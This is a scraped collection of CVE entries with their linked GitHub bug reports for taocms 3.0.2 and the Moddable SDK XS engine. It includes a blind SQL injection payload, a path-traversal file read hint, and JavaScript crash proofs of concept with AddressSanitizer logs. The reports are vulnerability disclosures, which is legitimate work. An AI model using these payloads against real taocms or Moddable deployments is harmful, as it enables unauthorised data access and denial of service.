https://github.com/jerryscript-project/jerryscript/issues/4917

CVE-2021-46203

2022-01-19T18:15:07.983

Taocms v3.0.2 was discovered to contain an arbitrary file read vulnerability via the path parameter.

https://github.com/taogogo/taocms/issues/13

github.com

## poc After login as admin,file manager and downloadfunction  after change path param can read arbitrary file  ## analysis location:include/File.php   we can use ../ to traverse to the previous directory ## suggest you can check path ,for example check if it has `..` then refuse this request

arbitrary file read vulnerability

https://api.github.com/repos/taogogo/taocms/issues/13/comments

2022-01-04T02:10:14Z

2022-01-04T02:10:14Z

https://github.com/taogogo/taocms/issues/13

CVE-2021-46204

2022-01-19T18:15:08.027

Taocms v3.0.2 was discovered to contain an arbitrary file read vulnerability via the path parameter. SQL injection vulnerability via taocms\include\Model\Article.php.

https://github.com/taogogo/taocms/issues/14

github.com

## analysis The location of the vulnerability is line 33 in taocms\include\Model\Article.php, and the incoming sql statement in the update() method does not use intval to process id,and Link.php extends Article   ## poc edit link   then edit id as `2)and+sleep(5)--+` 

There is SQL blind injection at "Management Link"

https://api.github.com/repos/taogogo/taocms/issues/14/comments

2022-01-04T02:47:28Z

2022-01-04T02:47:28Z

https://github.com/taogogo/taocms/issues/14

CVE-2021-46326

2022-01-20T22:15:08.157

Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow via the component __asan_memcpy.

https://github.com/Moddable-OpenSource/moddable/issues/759

github.com

##### Moddable-XS revision Commit: [2f93df29](https://github.com/Moddable-OpenSource/moddable/commit/2f93df297782cf0a31c1797b246becbf5e546f4f) Version: 11.5.0 32 4 ##### Build environment Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ##### Build steps ```bash cd ~/moddable/xs/makefiles/lin make -f xst.mk ``` ##### Test case ```javascript function JSEtest(str, count) { while (str.length < ("$1", 1 << 16)) { try { str += str; } catch (e) {} } return str.substring(); } var x = JSEtest("1", 1 << 20); var y = JSEtest("$1", 1 << 16); var exception; try { var __v_6623 = x.replace(/(.+)/g, y); } catch (e) { exception = e; } ``` ##### Execution & Output with ASAN ```bash $ ./moddable/build/bin/lin/debug/xst poc.js ==113836==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fdb09ffc820 at pc 0x0000004ec9ac bp 0x7ffe814586d0 sp 0x7ffe81457e80 WRITE of size 65536 at 0x7fdb09ffc820 thread T0 #0 0x4ec9ab in __asan_memcpy (/usr/local/bin/xst+0x4ec9ab) #1 0x915e02 in fxPushSubstitutionString /root/moddable/xs/sources/xsString.c:1995:9 #2 0x839a57 in fx_RegExp_prototype_replace /root/moddable/xs/sources/xsRegExp.c:834:5 #3 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7 #4 0x90d877 in fx_String_prototype_withRegexp /root/moddable/xs/sources/xsString.c:1675:5 #5 0x8fc277 in fx_String_prototype_replace /root/moddable/xs/sources/xsString.c:1120:6 #6 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7 #7 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4 #8 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2 #9 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8 #10 0x7fdb0cd0fbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #11 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9) 0x7fdb09ffc820 is located 0 bytes to the right of 16777248-byte region [0x7fdb08ffc800,0x7fdb09ffc820) allocated by thread T0 here: #0 0x4edc80 in malloc (/usr/local/bin/xst+0x4edc80) #1 0x7dba63 in fxAllocateChunks /root/moddable/xs/sources/xsPlatforms.c:123:9 #2 0x759641 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506:11 #3 0x75876a in fxAllocate /root/moddable/xs/sources/xsMemory.c:170:2 #4 0x53d89c in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1382:4 #5 0xace769 in main /root/moddable/xs/tools/xst.c:259:19 #6 0x7fdb0cd0fbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/bin/xst+0x4ec9ab) in __asan_memcpy Shadow bytes around the buggy address: 0x0ffbe13f78b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffbe13f78c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffbe13f78d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffbe13f78e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffbe13f78f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0ffbe13f7900: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa 0x0ffbe13f7910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffbe13f7920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffbe13f7930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffbe13f7940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ffbe13f7950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==113836==ABORTING ``` #### No-ASAN Output ```bash [1] 5720 segmentation fault xst poc.js ``` Credits: Found by OWL337 team.

Heap-buf-overflow (/usr/local/bin/xst+0x4ec9ab) in __asan_memcpy

https://api.github.com/repos/Moddable-OpenSource/moddable/issues/759/comments

2021-12-28T09:45:33Z

2022-01-13T15:17:53Z

https://github.com/Moddable-OpenSource/moddable/issues/759

CVE-2021-46327

2022-01-20T22:15:08.197

Moddable SDK v11.5.0 was discovered to contain a SEGV vulnerability via xs/sources/xsArray.c in fx_Array_prototype_sort.

https://github.com/Moddable-OpenSource/moddable/issues/766

github.com

##### Moddable-XS revision Commit: [2f93df29](https://github.com/Moddable-OpenSource/moddable/commit/2f93df297782cf0a31c1797b246becbf5e546f4f) Version: 11.5.0 32 4 ##### Build environment Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ##### Build steps ```bash cd ~/moddable/xs/makefiles/lin #debug make -f xst.mk ``` ##### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript var size = 256; var array1 = new Array(size); function toStr() { array1.splice(0, 2); return array1.sort().toString(); } function JSEtest() { for (var i = 0; i < size; i++) { array1[i] = new Array(i); array1.sort()[i].toString = toStr; } array1.sort(); } JSEtest(); ``` </code></pre> </details> ##### Execution & Output ```bash $ ./moddable/build/bin/lin/debug/xst poc.js AddressSanitizer:DEADLYSIGNAL ================================================================= ==101668==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x00000057e1b4 bp 0x7ffe5dc36870 sp 0x7ffe5dc35840 T0) ==101668==The signal is caused by a READ memory access. ==101668==Hint: address points to the zero page. #0 0x57e1b3 in fx_Array_prototype_sort /root/moddable/xs/sources/xsArray.c:2237:7 #1 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7 #2 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4 #3 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2 #4 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8 #5 0x7faf269ccbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #6 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/moddable/xs/sources/xsArray.c:2237:7 in fx_Array_prototype_sort ==101668==ABORTING ``` Credits: Found by OWL337 team.

SEGV xs/sources/xsArray.c:2237:7 in fx_Array_prototype_sort

https://api.github.com/repos/Moddable-OpenSource/moddable/issues/766/comments

2022-01-07T16:05:55Z

2022-02-09T23:53:55Z

https://github.com/Moddable-OpenSource/moddable/issues/766

CVE-2021-46328

2022-01-20T22:15:08.247

Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow via the component __libc_start_main.

https://github.com/Moddable-OpenSource/moddable/issues/751

github.com

##### Moddable-XS revision Commit: [db8f973](https://github.com/Moddable-OpenSource/moddable/commit/db8f9735c20c07c189d7f4a0574e787d4a6669ea) Version: 11.5.0 32 4 ##### Build environment Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ##### Build steps ```bash cd ~/moddable/xs/makefiles/lin make debug ``` ##### Test case ```javascript function JSEtest(x, n) { while (x.length < n) { x += x; } return x.substring(0, n); } var x = JSEtest("1", 1 << 20); var rep = JSEtest("$1", 1 << 16); var y = x.replace(/(.+)/g, rep); y.length; ``` ##### Execution & Output ```bash $ ./xst test.js ================================================================= ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f62dd0fe820 at pc 0x7f62e0bf477a bp 0x7ffd65c0fc60 sp 0x7ffd65c0f408 WRITE of size 1048576 at 0x7f62dd0fe820 thread T0 #0 0x7f62e0bf4779 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79779) #1 0x564bd7f19243 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #2 0x564bd7f19243 in fxPushSubstitutionString /root/moddable/xs/sources/xsString.c:1989 #3 0x564bd7e46db6 in fx_RegExp_prototype_replace /root/moddable/xs/sources/xsRegExp.c:834 #4 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842 #5 0x564bd7f1c334 in fx_String_prototype_withRegexp /root/moddable/xs/sources/xsString.c:1675 #6 0x564bd7f1c334 in fx_String_prototype_replace /root/moddable/xs/sources/xsString.c:1120 #7 0x564bd7e51f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842 #8 0x564bd7ebcc27 in fxRunScript /root/moddable/xs/sources/xsRun.c:4766 #9 0x564bd80ce90a in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387 #10 0x564bd79f54c7 in main /root/moddable/xs/tools/xst.c:281 #11 0x7f62e01eebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #12 0x564bd79f70c9 in _start (/root/moddable/build/bin/lin/debug/xst+0x950c9) 0x7f62dd0fe820 is located 0 bytes to the right of 16777248-byte region [0x7f62dc0fe800,0x7f62dd0fe820) allocated by thread T0 here: #0 0x7f62e0c59b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x564bd7d2fa66 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506 #2 0x564bd7d630a3 in fxAllocate /root/moddable/xs/sources/xsMemory.c:170 #3 0x564bd7a19d9a in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1367 #4 0x564bd79f2ddf in main /root/moddable/xs/tools/xst.c:259 #5 0x7f62e01eebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79779) Shadow bytes around the buggy address: 0x0fecdba17cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fecdba17cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fecdba17cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fecdba17ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fecdba17cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fecdba17d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0fecdba17d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ``` Credits: Found by OWL337 team.

Heap-buffer-overflow in __libc_start_main

https://api.github.com/repos/Moddable-OpenSource/moddable/issues/751/comments

2021-12-14T02:49:38Z

2022-01-12T02:24:53Z

https://github.com/Moddable-OpenSource/moddable/issues/751

CVE-2021-46329

2022-01-20T22:15:08.290

Moddable SDK v11.5.0 was discovered to contain a SEGV vulnerability via the component _fini.

https://github.com/Moddable-OpenSource/moddable/issues/768

github.com

##### Moddable-XS revision Commit: [2f93df29](https://github.com/Moddable-OpenSource/moddable/commit/2f93df297782cf0a31c1797b246becbf5e546f4f) Version: 11.5.0 32 4 ##### Build environment Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ##### Build steps ```bash cd ~/moddable/xs/makefiles/lin make -f xst.mk ``` ##### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function JSEtest() { return { __proto__: setInterval(/a/g, "") } instanceof Array && !({ __proto__: null } instanceof Object); } if (!JSEtest()) throw new Error("Test failed"); ``` </code></pre> </details> ##### Execution & Output ```bash $ ./moddable/build/bin/lin/debug/xst poc.js Error: Test failed AddressSanitizer:DEADLYSIGNAL ================================================================= ==50961==ERROR: AddressSanitizer: SEGV on unknown address 0x000000dfee60 (pc 0x000000dfee60 bp 0x7ffe67452190 sp 0x7ffe67452088 T0) ==50961==The signal is caused by a READ memory access. ==50961==Hint: PC is at a non-executable region. Maybe a wild jump? #0 0xdfee5f in _fini (/usr/local/bin/xst+0xdfee5f) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/local/bin/xst+0xdfee5f) in _fini ==50961==ABORTING ``` Credits: Found by OWL337 team.

SEGV (/usr/local/bin/xst+0xdfee5f) in _fini

https://api.github.com/repos/Moddable-OpenSource/moddable/issues/768/comments

2022-01-07T16:08:53Z

2022-02-09T23:53:55Z

https://github.com/Moddable-OpenSource/moddable/issues/768

CVE-2021-46330

2022-01-20T22:15:08.333

Moddable SDK v11.5.0 was discovered to contain a SEGV vulnerability via xs/sources/xsDataView.c in fx_ArrayBuffer_prototype_concat.

https://github.com/Moddable-OpenSource/moddable/issues/774

github.com

##### Moddable-XS revision Commit: [2f93df29](https://github.com/Moddable-OpenSource/moddable/commit/2f93df297782cf0a31c1797b246becbf5e546f4f) Version: 11.5.0 32 4 ##### Build environment Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ##### Build steps ```bash cd ~/moddable/xs/makefiles/lin make -f xst.mk ``` ##### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function JSEtest(f, args) { var bound = Function.prototype.bind.apply(f, new ArrayBuffer(64).concat(new Object)); return new bound(); } var d = JSEtest(Date, [1957, 4, 27]); ``` </code></pre> </details> ##### Execution & Output ```bash $ ./moddable/build/bin/lin/debug/xst poc.js AddressSanitizer:DEADLYSIGNAL ================================================================= ==62908==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000061df67 bp 0x7fff84c54690 sp 0x7fff84c544f0 T0) ==62908==The signal is caused by a READ memory access. ==62908==Hint: address points to the zero page. #0 0x61df66 in fx_ArrayBuffer_prototype_concat /root/moddable/xs/sources/xsDataView.c:559:24 #1 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7 #2 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4 #3 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2 #4 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8 #5 0x7f1a84524bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #6 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/moddable/xs/sources/xsDataView.c:559:24 in fx_ArrayBuffer_prototype_concat ==62908==ABORTING ``` Credits: Found by OWL337 team.

SEGV xs/sources/xsDataView.c:559:24 in fx_ArrayBuffer_prototype_concat

https://api.github.com/repos/Moddable-OpenSource/moddable/issues/774/comments

2022-01-10T02:55:10Z

2022-01-13T15:16:29Z

https://github.com/Moddable-OpenSource/moddable/issues/774

CVE-2021-46331

2022-01-20T22:15:08.377

Moddable SDK v11.5.0 was discovered to contain a SEGV vulnerability via xs/sources/xsProxy.c in fxProxyGetPrototype.

https://github.com/Moddable-OpenSource/moddable/issues/750

github.com

##### Moddable-XS revision Commit: [db8f973](https://github.com/Moddable-OpenSource/moddable/commit/db8f9735c20c07c189d7f4a0574e787d4a6669ea) Version: 11.5.0 32 4 ##### Build environment Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ##### Build steps ```bash cd ~/moddable/xs/makefiles/lin #(debug) make -f xst.mk ``` ##### Test case ```javascript function JSEtest(proxyTarget) { var { proxy, revoke } = Proxy.revocable(proxyTarget, new Proxy({}, { get(target, propertyKey, receiver) { revoke(); } })); return proxy; } Object.getPrototypeOf(JSEtest({})); ``` ###### Execution & Output ```bash $ ./moddable/build/bin/lin/debug/xst poc.js ASAN:DEADLYSIGNAL ================================================================= ==68595==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000009 (pc 0x55aceefcfbc1 bp 0x7ffebf0ad710 sp 0x7ffebf0ad6c0 T0) ==68595==The signal is caused by a READ memory access. ==68595==Hint: address points to the zero page. #0 0x55aceefcfbc0 in fxProxyGetPrototype /root/moddable/xs/sources/xsProxy.c:506 #1 0x55acef001f0f in fxRunID /root/moddable/xs/sources/xsRun.c:842 #2 0x55acef06cc27 in fxRunScript /root/moddable/xs/sources/xsRun.c:4766 #3 0x55acef27e90a in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387 #4 0x55aceeba54c7 in main /root/moddable/xs/tools/xst.c:281 #5 0x7f00319aabf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #6 0x55aceeba70c9 in _start (/root/moddable/build/bin/lin/debug/xst+0x950c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/moddable/xs/sources/xsProxy.c:506 in fxProxyGetPrototype ==68595==ABORTING ``` Credits: Found by OWL337 team.

SEGV xs/sources/xsProxy.c:506 in fxProxyGetPrototype

https://api.github.com/repos/Moddable-OpenSource/moddable/issues/750/comments

2021-12-14T02:18:16Z

2022-01-12T02:24:00Z

https://github.com/Moddable-OpenSource/moddable/issues/750

CVE-2021-46332

2022-01-20T22:15:08.420

Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow via xs/sources/xsDataView.c in fxUint8Getter.

https://github.com/Moddable-OpenSource/moddable/issues/749

github.com

# Build environment - operating system: ubuntu20.04 - cimmit hash: db8f9735c20c07c189d7f4a0574e787d4a6669ea - compile command: ``` cd /pathto/moddable/xs/makefiles/lin make debug or make release ``` - test command: ``` export ASAN_OPTIONS=detect_leaks=0 ./xst poc ``` # poc ``` var f32 = new Float32Array(127); for (var n = 7; n; n--) f32["sort"](function (fuzz_v21, fuzz_v22, fuzz_v23) { f32.length = 2; var fuzz_v31 = [ "4LZ3E", "__proto__" ]; return n; }); ``` # description - asan log ``` ================================================================= ==2234547==ERROR: AddressSanitizer: SEGV on unknown address 0x7f24423e0ffc (pc 0x000000530514 bp 0x7fff6c350510 sp 0x7fff6c3504e0 T0) ==2234547==The signal is caused by a READ memory access. #0 0x530514 in fxFloat32Getter /home/sakura/moddable/xs/sources/xsDataView.c:2709:8 #1 0x5282e8 in fxCompareTypedArrayItem /home/sakura/moddable/xs/sources/xsDataView.c:1234:3 #2 0x52f1aa in fx_TypedArray_prototype_sort /home/sakura/moddable/xs/sources/xsDataView.c:2303:14 #3 0x59b4b7 in fxRunID /home/sakura/moddable/xs/sources/xsRun.c:842:8 #4 0x5b50e2 in fxRunScript /home/sakura/moddable/xs/sources/xsRun.c:4766:4 #5 0x61567c in fxRunProgramFile /home/sakura/moddable/xs/tools/xst.c:1387:2 #6 0x60fbef in main /home/sakura/moddable/xs/tools/xst.c:281:8 #7 0x7f24489850b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #8 0x42e6bd in _start (/home/sakura/moddable/build/bin/lin/debug/xst+0x42e6bd) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/sakura/moddable/xs/sources/xsDataView.c:2709:8 in fxFloat32Getter ==2234547==ABORTING ``` - release crash ``` [] ~/sk-afl-js/moddable_workdir <main> ~/moddable/build/bin/lin/release/xst fuzz_output/fuzzer1/crashes/id:000001,sig:06,src:017947,op:\(null\),pos:0.js [2] 2205390 segmentation fault ~/moddable/build/bin/lin/release/xst ```

AddressSanitizer: SEGV in xs/sources/xsDataView.c:2709:8 in fxFloat32Getter

https://api.github.com/repos/Moddable-OpenSource/moddable/issues/749/comments

2021-12-13T06:51:03Z

2021-12-29T19:12:38Z

https://github.com/Moddable-OpenSource/moddable/issues/749

CVE-2021-46332

2022-01-20T22:15:08.420

Moddable SDK v11.5.0 was discovered to contain a heap-buffer-overflow via xs/sources/xsDataView.c in fxUint8Getter.

https://github.com/Moddable-OpenSource/moddable/issues/752

github.com

##### Moddable-XS revision Commit: [db8f973](https://github.com/Moddable-OpenSource/moddable/commit/db8f9735c20c07c189d7f4a0574e787d4a6669ea) Version: 11.5.0 32 4 ##### Build environment Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ##### Build steps ```bash cd ~/moddable/xs/makefiles/lin #(debug) make -f xst.mk ``` ##### Test case ```javascript var buf = new ArrayBuffer(65552); var numbers = new Uint8Array(buf); function v() { return 7; } function JSEtest(a, b) { return { valueOf: v }; } numbers.sort(JSEtest); ``` ##### Execution & Output ```bash $ ./xst poc.js ================================================================= ========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f86d2bfe7ff at pc 0x5558b4ed93a4 bp 0x7fffebd25aa0 sp 0x7fffebd25a90 READ of size 1 at 0x7f86d2bfe7ff thread T0 #0 0x5558b4ed93a3 in fxUint8Getter /root/moddable/xs/sources/xsDataView.c:2883 #1 0x5558b4e8afbb in fxCompareTypedArrayItem /root/moddable/xs/sources/xsDataView.c:1234 #2 0x5558b4e8e7d9 in fx_TypedArray_prototype_sort /root/moddable/xs/sources/xsDataView.c:2303 #3 0x5558b516fa1d in fxRunID /root/moddable/xs/sources/xsRun.c:842 #4 0x5558b51d642c in fxRunScript /root/moddable/xs/sources/xsRun.c:4766 #5 0x5558b53e48d1 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387 #6 0x5558b4d1c05e in main /root/moddable/xs/tools/xst.c:281 #7 0x7f86d6cd0bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #8 0x5558b4d1d789 in _start (/root/moddable/build/bin/lin/debug/xst+0x93789) 0x7f86d2bfe7ff is located 1 bytes to the left of 16777248-byte region [0x7f86d2bfe800,0x7f86d3bfe820) allocated by thread T0 here: #0 0x7f86d773bb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x5558b50510cd in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/moddable/xs/sources/xsDataView.c:2883 in fxUint8Getter Shadow bytes around the buggy address: 0x0ff15a577ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff15a577cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff15a577cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff15a577cd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0ff15a577ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0ff15a577cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0ff15a577d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff15a577d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff15a577d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff15a577d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff15a577d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb =======ABORTING ``` Credits: Found by OWL337 team.

Heap-buffer-overflow xs/sources/xsDataView.c:2883 in fxUint8Getter

https://api.github.com/repos/Moddable-OpenSource/moddable/issues/752/comments

2021-12-15T05:06:41Z

2022-01-12T02:25:04Z

https://github.com/Moddable-OpenSource/moddable/issues/752

CVE-2021-46333

2022-01-20T22:15:08.467

Moddable SDK v11.5.0 was discovered to contain an invalid memory access vulnerability via the component __asan_memmove.

https://github.com/Moddable-OpenSource/moddable/issues/769

github.com

##### Moddable-XS revision Commit: [2f93df29](https://github.com/Moddable-OpenSource/moddable/commit/2f93df297782cf0a31c1797b246becbf5e546f4f) Version: 11.5.0 32 4 ##### Build environment Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ##### Build steps ```bash cd ~/moddable/xs/makefiles/lin make -f xst.mk ``` ##### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript var arr = []; for (var i = 0; i < 28000; i++) { arr.push(new RegExp("ACAAAAATTAGCCGGGCGTGGTGGCGCGCGCCTGTAATCCCA" + i.toString(3))); } ``` </code></pre> </details> ##### Execution & Output ```bash $ ./moddable/build/bin/lin/debug/xst poc.js ================================================================= ==106165==ERROR: AddressSanitizer: negative-size-param: (size=-2147483584) #0 0x4ed5ec in __asan_memmove (/usr/local/bin/xst+0x4ed5ec) #1 0x762e01 in fxSweep /root/moddable/xs/sources/xsMemory.c:1629:6 #2 0x75a711 in fxCollect /root/moddable/xs/sources/xsMemory.c:278:3 #3 0x767e87 in fxFindChunk /root/moddable/xs/sources/xsMemory.c:407:3 #4 0x7678dd in fxNewChunk /root/moddable/xs/sources/xsMemory.c:1256:10 #5 0x9a70e4 in fxCompileRegExp /root/moddable/xs/sources/xsre.c:1697:13 #6 0x8469f7 in fxInitializeRegExp /root/moddable/xs/sources/xsRegExp.c:138:7 #7 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7 #8 0x845fb6 in fx_RegExp /root/moddable/xs/sources/xsRegExp.c:235:2 #9 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7 #10 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4 #11 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2 #12 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8 #13 0x7f80e3cdfbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #14 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9) 0x7f80e004d7f0 is located 331760 bytes inside of 16777248-byte region [0x7f80dfffc800,0x7f80e0ffc820) allocated by thread T0 here: #0 0x4edc80 in malloc (/usr/local/bin/xst+0x4edc80) #1 0x7dba63 in fxAllocateChunks /root/moddable/xs/sources/xsPlatforms.c:123:9 #2 0x759641 in fxGrowChunks /root/moddable/xs/sources/xsMemory.c:506:11 #3 0x75876a in fxAllocate /root/moddable/xs/sources/xsMemory.c:170:2 #4 0x53d89c in fxCreateMachine /root/moddable/xs/sources/xsAPI.c:1382:4 #5 0xace769 in main /root/moddable/xs/tools/xst.c:259:19 #6 0x7f80e3cdfbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: negative-size-param (/usr/local/bin/xst+0x4ed5ec) in __asan_memmove ==106165==ABORTING ``` ##### No-ASAN Output ```bash [1] 131060 segmentation fault xst poc.js ``` Credits: Found by OWL337 team.

Negative-size-param (/usr/local/bin/xst+0x4ed5ec) in __asan_memmove

https://api.github.com/repos/Moddable-OpenSource/moddable/issues/769/comments

2022-01-07T16:10:20Z

2022-01-13T15:16:53Z

https://github.com/Moddable-OpenSource/moddable/issues/769

CVE-2021-46334

2022-01-20T22:15:08.510

Moddable SDK v11.5.0 was discovered to contain a stack buffer overflow via the component __interceptor_strcat.

https://github.com/Moddable-OpenSource/moddable/issues/760

github.com

